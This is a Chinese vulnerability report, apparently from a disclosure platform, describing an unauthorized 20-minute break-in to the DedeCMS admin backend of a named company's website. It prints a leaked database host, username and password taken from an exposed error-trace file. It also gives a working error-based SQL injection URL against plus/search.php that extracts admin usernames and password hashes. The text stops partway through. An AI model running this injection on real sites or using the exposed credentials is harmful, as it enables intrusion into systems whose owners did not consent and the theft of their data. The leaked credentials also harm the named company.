亿中邮(亿邮)信息技术官方网站沦陷,已成功进入后台

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 今天本身没事。为了不让他买叫我盲打王。 所以就打算随便找一个厂商 进行一次 脚本入侵。然后就找到了“亿中邮信息技术” 我大概说一下。没拿下webshell 后台设置了禁止写入。包括数据库备份 根本不可能。另外上传页面直接删除掉了。 但是你们网站的问题很大。 整个入侵过程一共是 20分钟。你们后台就沦陷了!·下面我大概讲一下入侵的整个思路 ### 详细说明: 首先是网站主站有个意见反馈。然后我就很随意的 插入代码了。但是。返回的提交成功 一看就知道 dedecms页面。 然后我就知道。肯定是 失败的。 然后打开data/admin/ver.txt 发现版本很老啊。 然后测试打开http://www.eyou.net/data/mysql_error_trace.inc 的时候。我震惊了。这种是不可能出现的事情。 还是发生了。里面不光有后台地址。还有 5Bcfg_dbhost%5D=180.186.12.6&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=qq1314520&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB mysql一般情况下是链接不上的。 所以就不做测试了。除非他开启了%号。但是这个基本不太可能。当知道了版本 还知道了后台就更简单了。dedecms最近很火。各种注入 各种爆。 然后就找到了一个代码如下 plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a 然后就出现了...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息